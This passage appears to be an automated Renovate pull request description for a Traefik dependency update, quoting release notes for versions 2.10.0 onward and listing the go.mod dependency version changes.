• [acme] Update go-acme/lego to v4.12.0 (#​9918 by ldez)
• [acme] Update go-acme/lego to v4.11.0 (#​9883 by ldez)
• [acme] Do not check for wildcard domains for non DNS challenge (#​9881 by erkexzcx)
• [k8s/crd] Fix multiple subsets endpoint (#​9914 by joaosilva15)
• [k8s/ingress,k8s/crd,k8s,hub] Clean code related to Hub (#​9894 by ldez)
• [metrics] Enable Prometheus provider cleanup when only the router's metrics level is activated (#​9887 by rtribotte)
• [middleware] Encode query semicolons (#​9943 by LandryBe)
• [middleware] Missing trailer with custom errors middleware (#​9942 by rtribotte)
• [middleware] Support informational headers in middlewares redefining the response writer. (#​9938 by rtribotte)
• [plugins] Improve error messages related to plugins (#​9924 by ldez)
• [tracing] Update DataDog tracing dependency to v1.50.1 (#​9953 by der-eismann)

Documentation:

• [accesslogs] Fix over-indented yaml configuration of access logs (#​9930 by ufUNnxagpM)
• [tls] Add FAQ documentation about TLS certificates (#​9868 by rtribotte)
• Fix typo (#​9966 by green1052)
• Add business callouts (#​9940 by tomatokoolaid)
• Add logo for GitHub dark mode (#​9890 by ldez)

v2.10.1

Compare Source

All Commits

Bug fixes:

• [middleware,oxy] Update vulcand/oxy to be5cf38 (#​9874 by rtribotte)

Documentation:

• Fix v2.10 migration guide (#​9863 by rtribotte)

v2.10.0

Compare Source

All Commits

Enhancements:

• [docker] Expose ContainerName in Docker provider (#​9770 by quinot)
• [hub] Remove hub configuration out of experimental (#​9792 by mpl)
• [k8s/crd] Introduce traefik.io API Group CRDs (#​9765 by rtribotte)
• [k8s/ingress,k8s/crd,k8s] Native Kubernetes service load-balancing (#​9740 by rtribotte)
• [middleware,metrics] Add prometheus metric requests_total with headers (#​9783 by rtribotte)
• [nomad] Support multiple namespaces in the Nomad Provider (#​9794 by rtribotte)
• [tracing] Add support to send DataDog traces via Unix Socket (#​9714 by der-eismann)
• [webui] Modify the Hub Button (#​9851 by mdeliatf)
• [webui] Display period setting of the RateLimit middleware in the webui (#​9822 by smatyas)

**B

---

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/London, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 9 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.21 -> 1.22
github.com/davecgh/go-spew	v1.1.1 -> v1.1.2-0.20180830191138-d8f796af33cc
github.com/golang/protobuf	v1.5.3 -> v1.5.4
github.com/jonboulle/clockwork	v0.2.2 -> v0.4.0
github.com/miekg/dns	v1.1.47 -> v1.1.59
github.com/pmezard/go-difflib	v1.0.0 -> v1.0.1-0.20181226105442-5d4384ee4fb2
github.com/traefik/paerser	v0.1.5 -> v0.2.0
golang.org/x/mod	v0.6.0-dev.0.20220419223038-86c51ed26bb4 -> v0.18.0
golang.org/x/tools	v0.1.12 -> v0.22.0
google.golang.org/protobuf	v1.31.0 -> v1.33.0